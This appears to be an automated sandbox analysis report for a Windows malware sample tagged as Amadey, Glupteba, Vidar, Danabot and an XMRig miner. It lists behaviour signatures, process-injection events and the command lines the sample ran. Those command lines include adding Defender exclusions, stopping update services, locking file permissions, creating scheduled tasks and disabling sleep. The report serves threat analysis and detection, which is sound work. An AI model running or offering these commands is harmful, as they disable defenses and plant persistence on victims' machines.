Malware Analysis Report

2025-01-02 09:18

Sample ID 231004-1wt5pahc75
Target file
SHA256 8765a0a92fa60c2a4d21ca073dcf805f320c2e3d07703b97638b38888fe25d23
Tags
amadey danabot fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 banker dropper evasion loader spyware stealer trojan upx xmrig discovery miner persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8765a0a92fa60c2a4d21ca073dcf805f320c2e3d07703b97638b38888fe25d23

Threat Level: Known bad

The file was found to be: Known bad.

Malicious Activity Summary

xmrig

Suspicious use of NtCreateUserProcessOtherParentProcess

Amadey

Fabookie

Glupteba payload

Glupteba

Vidar

Danabot

Detect Fabookie payload

Modifies boot configuration data using bcdedit

XMRig Miner payload

Downloads MZ/PE file

Modifies Windows Firewall

Possible attempt to disable PatchGuard

Stops running service(s)

Drops file in Drivers directory

Blocklisted process makes network request

.NET Reactor protector

UPX packed file

Drops startup file

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Checks installed software on the system

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Modifies system certificate store

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Checks processor information in registry

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-04 22:00

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-04 22:00

Reported

2023-10-04 22:03

Platform

win7-20230831-en

Max time kernel

18s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

Danabot

trojan banker danabot

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5KBrTyNqjkzkfvnblop9vXu.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\k4RZBA7IbOJzP9tFcB0Uxzr8.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I9fjH7BPaqhRIbdsZsuw44gH.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X2YqWH1H43WyVCsftFGf25fs.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8Q07bsmA2SFivlZEMcwdn3hb.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\32QePm4KyaXGR23aqiWCYXU7.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aqKNOYnM2WwyugEQZLP2WH2k.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\krf1bY6s7oSG5lwGiK0yR19v.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hfWzyh2UY8ErRZQrt8QdGnrZ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EFlDBBbXluGJT7fUQupu2wBz.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe N/A
N/A N/A C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2408 set thread context of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [certificate blob omitted] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [certificate blob omitted] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob omitted] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [certificate blob omitted] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [certificate blob omitted] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [certificate blob omitted] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [certificate blob omitted] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2408 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe
PID 2408 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe
PID 2408 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe
PID 2408 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2408 wrote to memory of 2264 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2264 wrote to memory of 564 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
PID 2264 wrote to memory of 564 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
PID 2264 wrote to memory of 564 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
PID 2264 wrote to memory of 564 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe
PID 2264 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
PID 2264 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
PID 2264 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
PID 2264 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
PID 2264 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
PID 2264 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
PID 2264 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
PID 2264 wrote to memory of 1664 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe
PID 2264 wrote to memory of 2196 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe
PID 2264 wrote to memory of 2196 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe
PID 2264 wrote to memory of 2196 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe
PID 2264 wrote to memory of 2196 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe
PID 2264 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe
PID 2264 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe
PID 2264 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe
PID 2264 wrote to memory of 1124 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe
PID 564 wrote to memory of 1504 N/A C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 564 wrote to memory of 1504 N/A C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 564 wrote to memory of 1504 N/A C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 564 wrote to memory of 1504 N/A C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe
PID 2264 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe
PID 2264 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe
PID 2264 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe
PID 2264 wrote to memory of 2148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe
PID 1504 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\system32\conhost.exe
PID 1504 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\system32\conhost.exe
PID 1504 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\system32\conhost.exe
PID 1504 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\system32\conhost.exe
PID 1224 wrote to memory of 1656 N/A C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp
PID 1224 wrote to memory of 1656 N/A C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe

"C:\Users\Admin\Pictures\iI4FE5DOdYGnsqgfJvFzKbNA.exe"

C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe

"C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe"

C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe

"C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe"

C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe

"C:\Users\Admin\Pictures\walat23dy3PjMc1F7wbJfEd7.exe"

C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe

"C:\Users\Admin\Pictures\ghj5tC29p41ay41weXgZ4WtI.exe"

C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe

"C:\Users\Admin\Pictures\EqY1yU2BuPoern4L1Clp7qEo.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe

"C:\Users\Admin\Pictures\ebu3UllRuMr9MdnUccCb3KDw.exe" --silent --allusers=0

C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe

"C:\Users\Admin\Pictures\u8iy3TCdGZHM8tCb1WqBJgR8.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp

"C:\Users\Admin\AppData\Local\Temp\is-AEPFU.tmp\a46CknyPHlvkEaN9CZpK7aBo.tmp" /SL5="$8001A,491750,408064,C:\Users\Admin\Pictures\a46CknyPHlvkEaN9CZpK7aBo.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Users\Admin\Pictures\FLnOhZMhkxBwS6yPdhkegb32.exe

"C:\Users\Admin\Pictures\FLnOhZMhkxBwS6yPdhkegb32.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Users\Admin\Pictures\1UHcLGYJC6WmkejoMRN5dfRU.exe

"C:\Users\Admin\Pictures\1UHcLGYJC6WmkejoMRN5dfRU.exe"

C:\Users\Admin\AppData\Local\Temp\is-04DMD.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-04DMD.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1130335503.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\1130335503.exe

"C:\Users\Admin\AppData\Local\Temp\1130335503.exe"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "204195515407223645-332532506182008150120580824635124315601540113345344060515"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "FykH2HsVfDnnj7oZVpqHE25N.exe" /f & erase "C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "FykH2HsVfDnnj7oZVpqHE25N.exe" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\taskeng.exe

taskeng.exe {8AA18C1B-A578-48E8-AAED-20993D8C9F84} S-1-5-21-607259312-1573743425-2763420908-1000:NGTQGRML\Admin:Interactive:[1]

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe

"C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

